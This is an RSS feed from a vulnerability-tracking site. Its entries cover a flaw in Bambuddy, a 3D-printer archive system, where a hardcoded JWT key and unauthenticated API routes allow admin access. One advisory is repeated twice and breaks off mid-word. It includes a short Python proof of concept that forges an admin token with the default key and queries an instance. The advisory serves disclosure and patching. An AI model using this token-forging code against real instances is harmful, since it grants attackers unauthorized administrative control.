<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Wed, 07 Oct 2026 17:56:11 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-267573</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-267573</link>
      <description>EUVD-2026-267573</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-267573</guid>
    </item>
    <item>
      <title>fkie_cve-2026-25505</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-25505</link>
      <description>&lt;p&gt;Bambuddy is a self-hosted print archive and management system for Bambu Lab 3D printers. Prior to version 0.1.7, a hardcoded secret key used for signing JWTs is checked into source code and ManyAPI routes do not check authentication. This issue has been patched in version 0.1.7.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Bambuddy is a self-hosted print archive and management system for Bambu Lab 3D printers. Prior to version 0.1.7, a hardcoded secret key used for signing JWTs is checked into source code and ManyAPI routes do not check authentication. This issue has been patched in version 0.1.7.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-25505</guid>
    </item>
    <item>
      <title>GHSA-gc24-px2r-5qmf — Bambuddy Uses Hardcoded Secret Key + Many API Endpoints do not Require Authentication</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-gc24-px2r-5qmf</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: bambuddy&lt;/p&gt;
&lt;p&gt;### Summary
1. A hardcoded secret key used for signing JWTs is checked into source code
2. ManyAPI routes do not check authentication&lt;/p&gt;
&lt;p&gt;### Details
I am using the publicly available docker image at `ghcr.io/maziggy/bambuddy`
#### 1. Hardcoded JWT Secret Key
https://github.com/maziggy/bambuddy/blob/a9bb8ed8239602bf08a9914f85a09eeb2bf13d15/backend/app/core/auth.py#L28&lt;/p&gt;
&lt;p&gt;&amp;lt;details&amp;gt;
&amp;lt;summary&amp;gt;Copying the Authorization token from a request via browser networking tools into JWT.io confirms the token is signed with this key&amp;lt;/summary&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;img width=&amp;#34;1591&amp;#34; height=&amp;#34;937&amp;#34; alt=&amp;#34;image&amp;#34; src=&amp;#34;https://github.com/user-attachments/assets/fd6e805a-9380-438f-a412-623660fa3f5a&amp;#34; /&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;/details&amp;gt;&lt;/p&gt;
&lt;p&gt;Any attacker can:
1. Forge valid JWT tokens for any user
2. Bypass authentication entirely
3. Gain full administrative access to any Bambuddy instance using the default key&lt;/p&gt;
&lt;p&gt;**Steps to Reproduce:**&lt;/p&gt;
&lt;p&gt;1. Run an instance of BamBuddy
2. Create admin user
3. Forge and use JWT:
```python
import jwt
import requests&lt;/p&gt;
&lt;p&gt;token = jwt.encode({&amp;#34;sub&amp;#34;: &amp;#34;admin&amp;#34;, &amp;#34;exp&amp;#34;: 9999999999}, &amp;#34;bambuddy-secret-key-change-in-production&amp;#34;, algorithm=&amp;#34;HS256&amp;#34;)
resp = requests.get(&amp;#34;http://10.0.0.4:8000/api/v1/system/info&amp;#34;, headers={&amp;#34;Authorization&amp;#34;: f&amp;#34;Bearer {token}&amp;#34;})&lt;/p&gt;
&lt;p&gt;print(resp.status_code) # 200
print(resp.text) # {&amp;#34;app&amp;#34;:{&amp;#34;version&amp;#34;:&amp;#34;0.1.7b&amp;#34;,&amp;#34;base_dir&amp;#34;:&amp;#34;/app/data&amp;#34;,&amp;#34;archive_dir&amp;#34;:&amp;#34;/app/data/archive&amp;#34;},&amp;#34;database&amp;#34;: ...
```&lt;/p&gt;
&lt;p&gt;#### 2. Most API Routes do not check Auth
While investigating the JWT forgery, I noticed that requests without `Authorization` he…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: bambuddy&lt;/p&gt;
&lt;p&gt;### Summary
1. A hardcoded secret key used for signing JWTs is checked into source code
2. ManyAPI routes do not check authentication&lt;/p&gt;
&lt;p&gt;### Details
I am using the publicly available docker image at `ghcr.io/maziggy/bambuddy`
#### 1. Hardcoded JWT Secret Key
https://github.com/maziggy/bambuddy/blob/a9bb8ed8239602bf08a9914f85a09eeb2bf13d15/backend/app/core/auth.py#L28&lt;/p&gt;
&lt;p&gt;&amp;lt;details&amp;gt;
&amp;lt;summary&amp;gt;Copying the Authorization token from a request via browser networking tools into JWT.io confirms the token is signed with this key&amp;lt;/summary&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;img width=&amp;#34;1591&amp;#34; height=&amp;#34;937&amp;#34; alt=&amp;#34;image&amp;#34; src=&amp;#34;https://github.com/user-attachments/assets/fd6e805a-9380-438f-a412-623660fa3f5a&amp;#34; /&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;/details&amp;gt;&lt;/p&gt;
&lt;p&gt;Any attacker can:
1. Forge valid JWT tokens for any user
2. Bypass authentication entirely
3. Gain full administrative access to any Bambuddy instance using the default key&lt;/p&gt;
&lt;p&gt;**Steps to Reproduce:**&lt;/p&gt;
&lt;p&gt;1. Run an instance of BamBuddy
2. Create admin user
3. Forge and use JWT:
```python
import jwt
import requests&lt;/p&gt;
&lt;p&gt;token = jwt.encode({&amp;#34;sub&amp;#34;: &amp;#34;admin&amp;#34;, &amp;#34;exp&amp;#34;: 9999999999}, &amp;#34;bambuddy-secret-key-change-in-production&amp;#34;, algorithm=&amp;#34;HS256&amp;#34;)
resp = requests.get(&amp;#34;http://10.0.0.4:8000/api/v1/system/info&amp;#34;, headers={&amp;#34;Authorization&amp;#34;: f&amp;#34;Bearer {token}&amp;#34;})&lt;/p&gt;
&lt;p&gt;print(resp.status_code) # 200
print(resp.text) # {&amp;#34;app&amp;#34;:{&amp;#34;version&amp;#34;:&amp;#34;0.1.7b&amp;#34;,&amp;#34;base_dir&amp;#34;:&amp;#34;/app/data&amp;#34;,&amp;#34;archive_dir&amp;#34;:&amp;#34;/app/data/archive&amp;#34;},&amp;#34;database&amp;#34;: ...
```&lt;/p&gt;
&lt;p&gt;#### 2. Most API Routes do not check Auth
While investigating the JWT forgery, I noticed that requests without `Authorization` he…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-gc24-px2r-5qmf</guid>
    </item>
  </channel>
</rss>
